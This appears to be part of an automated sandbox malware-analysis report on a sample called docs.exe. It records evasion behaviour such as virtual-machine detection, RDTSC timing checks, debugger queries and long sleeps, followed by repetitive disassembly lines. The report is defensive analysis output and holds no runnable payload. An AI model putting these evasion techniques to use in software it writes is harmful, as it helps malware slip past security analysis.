          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: docs.exe PID: 2672, type: MEMORYSTR
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\docs.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Users\user\Desktop\docs.exeAPI/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Users\user\Desktop\docs.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Users\user\Desktop\docs.exeAPI/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Users\user\Desktop\docs.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
          Source: C:\Users\user\Desktop\docs.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\docs.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\docs.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 2A09904 second address: 2A0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 2A09B7E second address: 2A09B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\docs.exeMemory allocated: 13B0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\docs.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\docs.exeMemory allocated: 1580000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\docs.exeMemory allocated: 7E30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\docs.exeMemory allocated: 8E30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\docs.exeMemory allocated: 8FE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\docs.exeMemory allocated: 9FE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\docs.exeMemory allocated: A340000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\docs.exeMemory allocated: B340000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\docs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6056Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3662Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9827Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 888Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow / User API: threadDelayed 9840Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-13823
          Source: C:\Users\user\Desktop\docs.exeAPI coverage: 1.6 %
          Source: C:\Windows\SysWOW64\wscript.exeAPI coverage: 1.5 %
          Source: C:\Users\user\Desktop\docs.exe TID: 2792Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2144Thread sleep count: 124 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2144Thread sleep time: -248000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2144Thread sleep count: 9827 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2144Thread sleep time: -19654000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe TID: 5160Thread sleep count: 132 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe TID: 5160Thread sleep time: -264000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe TID: 5160Thread sleep count: 9840 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe TID: 5160Thread sleep time: -19680000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005923CE GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,8_2_005923CE
          Source: C:\Users\user\Desktop\docs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
          Source: explorer.exe, 00000006.00000002.4603707608.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
          Source: explorer.exe, 00000006.00000002.4603707608.00000000098E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
          Source: explorer.exe, 00000006.00000000.2157815827.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: explorer.exe, 00000006.00000000.2150991767.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2157815827.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000000.2150991767.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
          Source: explorer.exe, 00000006.00000000.2163588037.000000000C24C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000006.00000002.4603707608.00000000098E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
          Source: explorer.exe, 00000006.00000000.2150991767.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000002.4603707608.00000000098E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 00000006.00000000.2150991767.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\docs.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3C0F0 mov eax, dword ptr fs:[00000030h]5_2_00F3C0F0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F820F0 mov ecx, dword ptr fs:[00000030h]5_2_00F820F0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3A0E3 mov ecx, dword ptr fs:[00000030h]5_2_00F3A0E3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01000115 mov eax, dword ptr fs:[00000030h]5_2_01000115
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC60E0 mov eax, dword ptr fs:[00000030h]5_2_00FC60E0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F480E9 mov eax, dword ptr fs:[00000030h]5_2_00F480E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC20DE mov eax, dword ptr fs:[00000030h]5_2_00FC20DE
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F380A0 mov eax, dword ptr fs:[00000030h]5_2_00F380A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD80A8 mov eax, dword ptr fs:[00000030h]5_2_00FD80A8
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014164 mov eax, dword ptr fs:[00000030h]5_2_01014164
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014164 mov eax, dword ptr fs:[00000030h]5_2_01014164
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4208A mov eax, dword ptr fs:[00000030h]5_2_00F4208A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6C073 mov eax, dword ptr fs:[00000030h]5_2_00F6C073
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F42050 mov eax, dword ptr fs:[00000030h]5_2_00F42050
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6050 mov eax, dword ptr fs:[00000030h]5_2_00FC6050
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010061C3 mov eax, dword ptr fs:[00000030h]5_2_010061C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010061C3 mov eax, dword ptr fs:[00000030h]5_2_010061C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD6030 mov eax, dword ptr fs:[00000030h]5_2_00FD6030
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3A020 mov eax, dword ptr fs:[00000030h]5_2_00F3A020
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3C020 mov eax, dword ptr fs:[00000030h]5_2_00F3C020
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E016 mov eax, dword ptr fs:[00000030h]5_2_00F5E016
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E016 mov eax, dword ptr fs:[00000030h]5_2_00F5E016
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E016 mov eax, dword ptr fs:[00000030h]5_2_00F5E016
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E016 mov eax, dword ptr fs:[00000030h]5_2_00F5E016
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010161E5 mov eax, dword ptr fs:[00000030h]5_2_010161E5
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC4000 mov ecx, dword ptr fs:[00000030h]5_2_00FC4000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F701F8 mov eax, dword ptr fs:[00000030h]5_2_00F701F8
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE1D0 mov eax, dword ptr fs:[00000030h]5_2_00FBE1D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE1D0 mov eax, dword ptr fs:[00000030h]5_2_00FBE1D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE1D0 mov ecx, dword ptr fs:[00000030h]5_2_00FBE1D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE1D0 mov eax, dword ptr fs:[00000030h]5_2_00FBE1D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE1D0 mov eax, dword ptr fs:[00000030h]5_2_00FBE1D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC019F mov eax, dword ptr fs:[00000030h]5_2_00FC019F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC019F mov eax, dword ptr fs:[00000030h]5_2_00FC019F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC019F mov eax, dword ptr fs:[00000030h]5_2_00FC019F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC019F mov eax, dword ptr fs:[00000030h]5_2_00FC019F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3A197 mov eax, dword ptr fs:[00000030h]5_2_00F3A197
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3A197 mov eax, dword ptr fs:[00000030h]5_2_00F3A197
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3A197 mov eax, dword ptr fs:[00000030h]5_2_00F3A197
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFC188 mov eax, dword ptr fs:[00000030h]5_2_00FFC188
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFC188 mov eax, dword ptr fs:[00000030h]5_2_00FFC188
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F80185 mov eax, dword ptr fs:[00000030h]5_2_00F80185
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE4180 mov eax, dword ptr fs:[00000030h]5_2_00FE4180
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE4180 mov eax, dword ptr fs:[00000030h]5_2_00FE4180
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46154 mov eax, dword ptr fs:[00000030h]5_2_00F46154
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46154 mov eax, dword ptr fs:[00000030h]5_2_00F46154
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3C156 mov eax, dword ptr fs:[00000030h]5_2_00F3C156
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD8158 mov eax, dword ptr fs:[00000030h]5_2_00FD8158
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010060B8 mov eax, dword ptr fs:[00000030h]5_2_010060B8
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010060B8 mov ecx, dword ptr fs:[00000030h]5_2_010060B8
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD4144 mov eax, dword ptr fs:[00000030h]5_2_00FD4144
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD4144 mov eax, dword ptr fs:[00000030h]5_2_00FD4144
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD4144 mov ecx, dword ptr fs:[00000030h]5_2_00FD4144
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD4144 mov eax, dword ptr fs:[00000030h]5_2_00FD4144
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD4144 mov eax, dword ptr fs:[00000030h]5_2_00FD4144
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F70124 mov eax, dword ptr fs:[00000030h]5_2_00F70124
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEA118 mov ecx, dword ptr fs:[00000030h]5_2_00FEA118
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEA118 mov eax, dword ptr fs:[00000030h]5_2_00FEA118
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEA118 mov eax, dword ptr fs:[00000030h]5_2_00FEA118
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEA118 mov eax, dword ptr fs:[00000030h]5_2_00FEA118
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov eax, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov ecx, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov eax, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov eax, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov ecx, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov eax, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov eax, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov ecx, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov eax, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov ecx, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F502E1 mov eax, dword ptr fs:[00000030h]5_2_00F502E1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F502E1 mov eax, dword ptr fs:[00000030h]5_2_00F502E1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F502E1 mov eax, dword ptr fs:[00000030h]5_2_00F502E1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01018324 mov eax, dword ptr fs:[00000030h]5_2_01018324
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01018324 mov ecx, dword ptr fs:[00000030h]5_2_01018324
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01018324 mov eax, dword ptr fs:[00000030h]5_2_01018324
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01018324 mov eax, dword ptr fs:[00000030h]5_2_01018324
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]5_2_00F4A2C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]5_2_00F4A2C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]5_2_00F4A2C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]5_2_00F4A2C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]5_2_00F4A2C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0101634F mov eax, dword ptr fs:[00000030h]5_2_0101634F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100A352 mov eax, dword ptr fs:[00000030h]5_2_0100A352
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD62A0 mov eax, dword ptr fs:[00000030h]5_2_00FD62A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD62A0 mov ecx, dword ptr fs:[00000030h]5_2_00FD62A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD62A0 mov eax, dword ptr fs:[00000030h]5_2_00FD62A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD62A0 mov eax, dword ptr fs:[00000030h]5_2_00FD62A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD62A0 mov eax, dword ptr fs:[00000030h]5_2_00FD62A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD62A0 mov eax, dword ptr fs:[00000030h]5_2_00FD62A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E284 mov eax, dword ptr fs:[00000030h]5_2_00F7E284
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E284 mov eax, dword ptr fs:[00000030h]5_2_00F7E284
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC0283 mov eax, dword ptr fs:[00000030h]5_2_00FC0283
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC0283 mov eax, dword ptr fs:[00000030h]5_2_00FC0283
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC0283 mov eax, dword ptr fs:[00000030h]5_2_00FC0283
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
